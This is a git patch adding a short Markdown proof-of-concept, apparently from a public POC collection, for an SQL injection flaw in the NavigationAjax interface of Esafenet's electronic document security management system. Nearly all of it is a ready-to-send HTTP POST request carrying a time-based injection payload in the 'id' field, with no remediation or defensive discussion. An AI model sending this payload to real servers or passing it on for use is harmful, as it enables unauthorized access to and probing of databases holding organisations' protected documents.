From a920ac478c916699eff7684cb3420cf320f24f8b Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 12 Mar 2024 18:44:29 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BA=BF=E8=B5=9B=E9=80=9A=E7=94=B5?= =?UTF-8?q?=E5=AD=90=E6=96=87=E6=A1=A3=E5=AE=89=E5=85=A8=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E7=B3=BB=E7=BB=9FNavigationAjax=E6=8E=A5=E5=8F=A3=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md diff --git a/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md new file mode 100644 index 0000000..e35e16f --- /dev/null +++ b/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md @@ -0,0 +1,14 @@ +## 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞 + + +## poc +``` +POST /CDGServer3/js/../NavigationAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=nav&id=-999'waitfor delay '0:0:3'--+&name=&openId= +``` + +![image](https://github.com/wy876/POC/assets/139549762/8bb3c1c9-a38d-475a-9162-8ad5de56b03f)